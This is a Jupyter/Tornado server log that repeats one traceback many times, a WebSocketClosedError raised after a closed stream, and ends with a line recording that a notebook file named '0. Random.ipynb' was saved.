  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35488' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35492' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35498' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35500' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35514' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35518' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35522' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35526' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35532' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35534' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35547' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35551' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35555' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35559' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35565' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35567' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35581' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35585' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35589' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35593' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35599' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35601' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35615' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35619' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35623' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35627' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35633' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35635' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35648' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35652' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35656' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35660' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35666' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35668' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35685' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35692' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35694' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35699' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35706' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35710' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35714' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35718' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35724' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35726' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35740' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35744' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35748' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35752' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35758' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35760' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
[I 2024-08-02 08:23:50.822 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
